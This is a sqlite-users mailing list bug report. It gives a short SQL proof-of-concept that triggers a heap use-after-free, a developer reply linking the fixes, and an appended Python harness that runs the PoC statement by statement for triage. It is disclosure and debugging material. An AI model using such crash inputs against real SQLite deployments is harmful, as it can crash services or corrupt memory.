On 28/12/62 01:58, Yongheng Chen wrote:
Hi,
We found a heap UAF bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ;
CREATE TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0 WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 SELECT * FROM v0 WHERE v1 OR 0 ;
CREATE VIEW v2 ( v3 ) AS WITH x1 AS ( SELECT * FROM v2 ) SELECT v3 AS x , v3 AS y FROM v2 ;
ALTER TABLE zipfile RENAME TO t3 ;
—
This bug exists in both the release code and the development code. It triggers a UAF under
ASan with the release code, while triggering an assert() in the development code.
Thanks for this. Looks like the ASan error was fixed here:
https://www.sqlite.org/src/info/de6e6d6846d6a41c
The assert() failure is now fixed here:
https://www.sqlite.org/src/info/d29edef93451cc67
Dan.
Yongheng & Rui
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
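The PoC above is a single line in which one ';' sits inside the CREATE TRIGGER body, so splitting it naively on semicolons feeds SQLite a half trigger. The following triage harness is an added example, not code from the report or from the SQLite project: it splits the PoC into whole statements with sqlite3.complete_statement (which understands CREATE TRIGGER ... END), runs them one at a time against an in-memory database, and records which statement fails and how. The names POC, split_statements and run_poc are this example's own. It assumes the stock Python sqlite3 module, which does not register the zipfile virtual table the reporters' fuzzing harness evidently had loaded, so on any build the final ALTER TABLE is expected to fail with "no such table: zipfile" rather than reach the rename code; reproducing the actual UAF needs an ASan build of the affected SQLite with zipfile registered, and the harness only reports which library version it is linked against for comparison with the check-ins Dan cites.

```python
import sqlite3

# The PoC exactly as posted in the report (a single string; note the ';'
# inside the trigger body between BEGIN and END).
POC = (
    "CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ; "
    "CREATE TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) "
    "SELECT v1 , v1 FROM v0 WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ; "
    "INSERT INTO v0 SELECT * FROM v0 WHERE v1 OR 0 ; "
    "CREATE VIEW v2 ( v3 ) AS WITH x1 AS ( SELECT * FROM v2 ) "
    "SELECT v3 AS x , v3 AS y FROM v2 ; "
    "ALTER TABLE zipfile RENAME TO t3 ;"
)


def split_statements(sql):
    """Split a script into complete statements.

    Pieces are accumulated until sqlite3.complete_statement() (a wrapper over
    sqlite3_complete()) reports a complete statement, so the ';' inside a
    CREATE TRIGGER ... BEGIN ... END body does not cut the trigger in half.
    """
    statements, buf = [], ""
    for piece in sql.split(";"):
        buf += piece + ";"
        if sqlite3.complete_statement(buf):
            stmt = buf.strip()
            if stmt != ";":          # trailing empty piece after the last ';'
                statements.append(stmt)
            buf = ""
    return statements


def run_poc(sql=POC):
    """Run each statement in a fresh in-memory database, one at a time.

    Returns a list of (statement, error) pairs where error is None on success
    or "ExceptionType: message" on failure. Running statement by statement
    pinpoints which one a given build rejects, crashes on, or accepts.
    Assumption: the stock sqlite3 module, so the zipfile virtual table from
    the reporters' harness is absent and the final ALTER TABLE is expected to
    fail with "no such table: zipfile" instead of exercising the rename path.
    """
    con = sqlite3.connect(":memory:")
    results = []
    try:
        for stmt in split_statements(sql):
            try:
                con.execute(stmt)
                results.append((stmt, None))
            except sqlite3.Error as exc:
                results.append((stmt, f"{type(exc).__name__}: {exc}"))
    finally:
        con.close()
    return results


def linked_sqlite_version():
    """Version string of the SQLite library this interpreter is linked against,
    for comparison against the fixing check-ins cited in the thread."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print("SQLite library version:", linked_sqlite_version())
    for i, (stmt, err) in enumerate(run_poc(), 1):
        status = "ok" if err is None else err
        print(f"[{i}] {stmt[:60]:<60} -> {status}")
```

If a statement crashes the process instead of raising, the last numbered line printed tells you where to start looking; under a sanitizer build that is where the ASan report will point.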